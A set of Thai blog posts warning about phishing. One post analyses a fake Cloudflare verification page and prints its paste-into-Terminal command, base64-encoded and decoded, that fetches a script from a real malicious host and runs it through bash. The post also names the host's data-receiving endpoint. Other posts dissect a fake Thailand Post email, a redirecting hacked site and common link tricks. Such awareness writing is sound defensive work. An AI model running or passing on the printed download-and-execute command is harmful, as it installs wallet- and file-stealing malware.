ตัวอย่างเว็บ Phishing หลอกให้ทำ Human Verification

* การทำตามมีความเสี่ยง ถ้าไม่แน่ใจอย่าเพิ่งทำตามนะครับ

วันนี้ค้นข้อมูลเรื่องเหล็กกล่อง (ซึ่งแน่นอนว่าไม่ได้เกี่ยวอะไรกับ post นี้) จนไปเจอเว็บนี้จากผลลัพธ์ของ google, https://buildmate.co.th/product-category/square-box-steel/

ตอนเข้าไปก็ไปเจอหน้าตา Cloudflare ที่เอาไว้ verify ว่าเป็นคนจริงๆ รึเปล่า ซึ่งก็ยังดูปกติดี จน checkbox verify ก็ขึ้นภาพตามด้านล่างมา เลยเอะใจว่าทำไมเดี๋ยวนี้ตอน verify ต้องมีให้กดเปิด Terminal ขึ้นมาด้วยนะ นั่นมันออกนอก browser ไปเแล้วนี่นา ไม่ปกติมากๆเลย แล้ว cloudflare จะรู้ได้ไงนะ เทคนิคใหม่หรอ เลยลองกดปุ่ม Copy ไปตามนั้น แต่คิดละว่าไม่ใช่เว็บดีๆแน่นอน (ไม่ควรทำตามอย่างยิ่ง)

พอกดปุ่ม Copy (เพื่อจะให้ไปวางใน Terminal) ก็จะได้ข้อมูลนี้มา
echo "Y3VybCAtcyBodHRwczovL2dhbW1hLm1lc2hzb3J0ZXJpby5jb20vcGFydHkvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash

พอเห็นว่ามีการสั่ง decode ด้วย base64 แปลว่าน่าจะซ่อนอะไรไว้ ก็เลยลองเอาไป decode ต่ออีกที ทำให้ข้อมูลด้านล่างนี้มา

curl -s https://gamma.meshsorterio.com/party/index.php | nohup bash &

เอ้า curl ก็ curl …. ก็เลยตามน้ำไปอีก จนเจอว่าเว็บข้างบนนั้นให้ script ยาวยืดเลย ขอไม่แปะละกัน เพื่อความปลอดภัย โดยใน script นั้น พยายามทำหลายอย่าง เช่น

  • หาว่ามี metamask (web3 crypto wallet) install อยู่มั๊ย และ wallet อีกหลายๆตัว
  • พยายามจะฝังตัวเองลงมาเพื่อขโมย wallet signature
  • มีการพยายามหา uuid และ ขอ password ของเครื่อง (เดาว่าดูจากเครื่องแล้วว่าเป็น mac เลยส่ง script ที่ compatible กับ mac มา)
  • มีการพยายามลง chome extension ตาม list ที่ส่งมา
  • พยายามอ่าน cookie และ bookmark บนเครื่อง
  • พยายามขโมยไฟล์บนเครื่อง แล้วส่งออกไปที่ https://meshsorterio.com/api/data/receive
  • แถมยังไปดาวโหลด script อื่นๆมาอีก เรียกว่าเป็น malware แล้วแบบนี้

และดูแล้วเหมือน antivirus หลายเจ้าจะยังไม่ได้ดักไว้ https://www.virustotal.com/gui/domain/gamma.meshsorterio.com/detection

จบการรายงานแต่เพียงเท่านี้ สวัสดี

ปล. ที่จะสื่อคือ การเข้าเว็บเดี๋ยวนี้อันตรายมาก นอกจากต้อง verify ว่าเราเป็นคนจริงๆแล้วนั้น เราเองก็ต้อง verify คน verify ด้วย ว่ามันปกติรึเปล่า … เป็นต้น

Phishing: ไปรษณีย์ไทย

วันนี้ได้รับอีเมลฉบับนึง บอกว่ามีพัสดุมาส่งถึงเราเมื่อวาน แล้วไม่สามารถจัดส่งได้เพราะว่าไม่มีผู้รับ แล้วจะจัดส่งให้ใหม่ในวันที่พรุ่งนี้ โดยมีค่าใช้จ่าย 48 บาท แล้วมีปุ่มให้เลือกว่าเราต้องการให้จัดส่งเวลาไหน

แต่ด้วยความเอะใจว่าช่วงนี้ไม่มีของที่สั่งเลย ไม่น่าจะมีอะไรส่งมา เลยลองอ่านอีเมลละเอียดๆก็พบว่า มันคือ Email phishing ที่ตั้งใจจะขโมยข้อมูลบัตรเครดิตของเรานั่นเอง

จุดตั้งข้อสังเกตบนอีเมล

มาลองดูกันว่ามีรายละเอียดอะไรบ้าง

  • หน้าตาอีเมลเมื่อเปิดบนมือถือ ค่อนข้างสมจริง เพราะ email address ผู้ส่งถูกซ่อนเอาไว้ แสดงแค่ POST TH แต่เมื่อลองกดเข้าไปดูดีๆจะพบว่า email ถูกส่งมาจาก [email protected] ซึ่งไม่ได้เป็น email official ของไปรษณีย์ไทย
  • ในหัวข้ออีเมล มีรหัส tracking no. ที่ไม่มีอยู่จริง (จริงๆดูจำนวนหลักก็พอจะเดาออก)
  • ด้านล่างของอีเมลที่ปกติจะมี link ให้ unsubscribe, ในกรณีนี้คือไม่มี link เลย น่าจะทำให้แค่เพิ่มความสมจริง
  • นอกจากนั้น เมื่อลองกด link ไปต่อ ก็จะพบว่ามันจะส่งเราไปที่เว็บไซต์ https://thailandpost-online-service.com/ เพื่อทำการจ่ายเงิน 48 บาท ที่อ้างว่าเป็นค่าธรรมเนียมในการจัดส่งอีกครั้ง ซึ่งปกติไปรษณีย์ไทยจะจัดส่งใหม่ให้เราฟรี เมื่อสังเกตดีๆจะพบว่า เว็บไซต์เองก็ไม่ใช่เว็บของไปรษณีย์ไทย
  • ตัวอีเมลเอง ยังมีการเร่งเร้าให้เราจ่ายเงินภายในเที่ยงคืนของวันนี้ เพื่อให้เหยื่อรีบทำแล้วไม่ได้ดูให้ถี่ถ้วน
  • ถ้าเรายังหลงกลไปต่ออีก ก็จะจุดจบ นั่นก็คือ ให้เรากรอกข้อมูลบัตรเครดิตเพื่อหักค่าธรรมเนียม เหมือนจะใช้ Payment gateway ของ Redsys เป็นบริษัทใน spain
เมื่อเปิด email บนมือถือที่ไม่แสดง from email address
หน้าให้เลือกวิธีจ่ายเงินบนมือถือ
หน้ากรอก credit card บนมือถือ

กรณีนี้ email จะดูว่าปลอดภัย เพราะส่งออกมาจากเจ้าของ domain ที่แท้จริง เพราะอีเมลส่งมาจาก kajabimail.net ถ้าลองไปแงะๆดูก็เหมือนจะมีการใส่ reply-to email address ไว้เป็น [email protected]

ตัวเว็บไซต์ปลอมเองก็มี TSL ที่ดูเหมือนว่าจะเพิ่งสร้างขึ้นมาวันนี้เอง (3 Oct 2021) ส่วน domain name ก็เพิ่งจดทะเบียนเมื่อวาน (2 Oct 2021) ตัว website host ที่ websitewelcome.com

ต้องบอกว่ารายละเอียดบางอย่างสมจริงระดับนึงเลย เราก็คงป้องกันด้วยการระวังตัวเองให้ดีต่อไป

ถ้าดูในเว็บไปรษณีย์ไทย จะพบว่ามีการเตือน phishing อย่างจริงจัง และมีข้อมูลการพยายามหลอกลวงอย่างมากมาย https://www.thailandpost.co.th/un/article_detail/article/11/20752

End.

หรือว่าเว็บในเครือ NetDesign จะถูกแฮค ?

เช้านี้ผมตื่นมาเช็คเมลตามปกติ ..  เจอแสปมเมลตามปกติ … แต่พักหลังชอลเล่นกับพวกแสปมเมล เพื่อดูว่าวิวัฒนาการของด้านมืดว่าไปถึงไหนกันแล้ว

 

ซึ่งวันนี้ก็ได้รับแสปมเมลที่เลียนแบบหน้าตาเมลของ Facebook (ซึ่งก็ได้เป็นปกติอีกนั่นแหล่ะ)

แต่ที่น่าแปลกใจคือลิงค์ของเมลอันนี้หยายามพาไปเว็บไซต์ http://nd.co.th/beecham.html ซึ่งแน่นอนว่ามันเป็นเว็บในบ้านเรา

ตอนแรกผมก็ประณามเต็มที่ เพราะคิดว่าเว็บบ้านเราต้องทำฟิชชิง (phishing) แบบนี้แล้วหรือ .. มันแย่มาก

แต่พอได้ลองเข้าเว็บ http://nd.co.th ไปดูจริงๆ ก็พบกว่าเว็บนี้เป็นเว็บในเครืองของ NetDesign บ.ที่สร้างชื่อจากการเปิดโรงเรียนสอนคอมพิวเตอร์ (คนอื่นอาจจะรู้จักมาก่อน แต่ผมรู้จักมันเพราะสอนคอมฯนี่แหล่ะ) ซึ่งในเว็บก็ดูโอเคทุกอย่าง

เลยทำให้เปลี่ยนความคิดว่า หรือว่าเว็บนี้อาจจะโดน Hack เพื่อทำ phishing หลอกไปที่อื่น ?  .. เลยลองกดตามลิงค์ในเมล ก็พบว่า

มันถูกส่งต่อไปยังเว็บ http://pillpillspharmacy.net/ ซึ่งเป็นเว็บขายยาอีกที

สุดท้ายก็สรุปไม่ได้ว่า เว็บนี้ตั้งใจทำแบบนี้หรือไม่ (แต่ส่วนตัวคิดว่าน่าจะโดนแฮคล่ะ) … ถ้าโดนแฮคจริงก็คงต้องรอเค้าแก้กันต่อไป

อันนี้ก็คงเป็นสิ่งเตือนใจว่า ในฐานะคนเล่นเน็ต จะคลิกอะไรก็ดูให้ดีๆก่อน เพราะเกิดหน้าที่ส่งต่อไปทำเนียนเป็นหน้า Facebook หรือว่าปล่อยไวรัสก็สยองอยู่ ส่วนในฐานะคนทำเว็บ ก็ต้องดูให้ดีว่าเว็บเราไม่ได้เป็นเครื่องมือให้ใครเอาไปทำอะไรไม่ดีได้

 

ปล. ก่อนคลิกลิงค์นี้ Hotmail ก็มีเตือนว่าลิงค์ที่เรากดนั้นอาจจะมีอันตรายได้ .. แต่ด้วยความอยากรู้อยากเห็นเราก็คลิกอยู่ดี 😛

Phishing : สร้างเว็บหลอกแล้วปอกลอก

พอดีว่าไปอ่านบล็อกของ Pakkardkaw (ขยันปั่นชิบ) เรื่องเว็บ Hotmail ปลอมหลอกถาม Password เลยขอเอามาขยายความหน่อย 🙂

เหตุการณ์อย่างที่กล่าวข้างต้นคือการทำ Phishing ซึ่งเป็นคำที่แสลงมาจาก Fishing อีกที ความหมายก็เป็นเหมือนๆการตกปลา คือปล่อยเหยื่อล่อแล้วให้ปลามากินเหยื่อ ในที่นี้ก็คือสร้างเว็บหลอกให้เราเข้าไปกรอกข้อมูล

ส่วนเหตุการณ์จริงก็จะเป็นประมาณสร้างเว็บหน้าตาเหมือนเว็บชื่อดังทั่วไป (ดูด้วยตาจะเหมือน 100% เลย) ส่วนใหญ่จะเน้นไปทางเว็บการเงิน เว็บเมล เว็บ Social Network หรือว่าง่ายๆก็คือเว็บที่น่าขโมย Username/Password ไปจนถึงรหัสบัตรเครดิต, บัญชีธนาคารกันเลยทีเีดียว

เมื่อมีเว็บที่หน้าตาเหมือนต้นฉบับแล้ว อันต่อมาก็คือ วิธีทำให้เหยื่อเข้าไปยังเว็บหน้านั้นๆ ส่วนใหญ่จะมากับ Link แบบต่างๆเช่น

  • ลิงค์ที่มาจากรูปภาพ อันนี้ก็จะดูยากหน่อยว่าจริงๆแล้ว Link นั้นจะพาเราไปไหน
  • ลิงค์ที่ตัวอักษรดูดี แต่ซ่อนปลายาทางไปอีกที่นึง เช่น ตัวอักษรเป็น Facebook.com แต่ตัว Link จริงๆพาไปที่ facebook.xfrg.tar.lb เป็นต้น
  • อีกวิธีนึงที่เพิ่งจะได้ีรับความนิยมคือ ลิงค์ผ่านบริการย่อ URL (เช่น http://bit.ly/mA0LCq )อันนี้คนเข้าแทบจะไม่สามารถรู้ล่วงหน้าได้เลยว่า Link ที่ผ่านการย่อ URL มาแล้วนั้นจะพาเรา้ไปที่ไหน อันนี้นอกจากจะเจอ Phishing ได้ง่ายแล้ว บริการย่อลิงค์นี่อาจจะพาไปสู่ไวรัสและอันตรายอื่นๆอีกเยอะเลย
  • เว็บไซต์สะกดผิด อันนี้จะเป็น URL ที่เผลอสะกดผิดง่ายๆ เช่น amazom.com ก็จะไปสร้างเว็บหลอกไว้ (แต่สำหรับ amazom นั้น ทาง amazon ตัวจริงไปจดเอาไว้แล้วพาไปเว็บจริงให้ถูกต้อง ถือเป็นการป้องกัน phishing อีกวิธีนึง)

http://retwite.appspot.com/

http://twitter.com/

ซึ่งสองสามแบบแรกนั้นหลายๆครั้งก็จะมาในรูปแบบอีเมล มาบอกว่า User คุณไม่ได้ใช้งานนานแล้ว ให้ login เพื่อยืนยันตัวตน (แล้วก็ทำลิงค์หลอกให้เข้าไป) หรือบางทีก็บอกว่า บังคับเปลี่ยน Password ให้เข้าลิงค์นี้แล้วใส่ username/password อันเก่า เป็นต้น

Scroll to top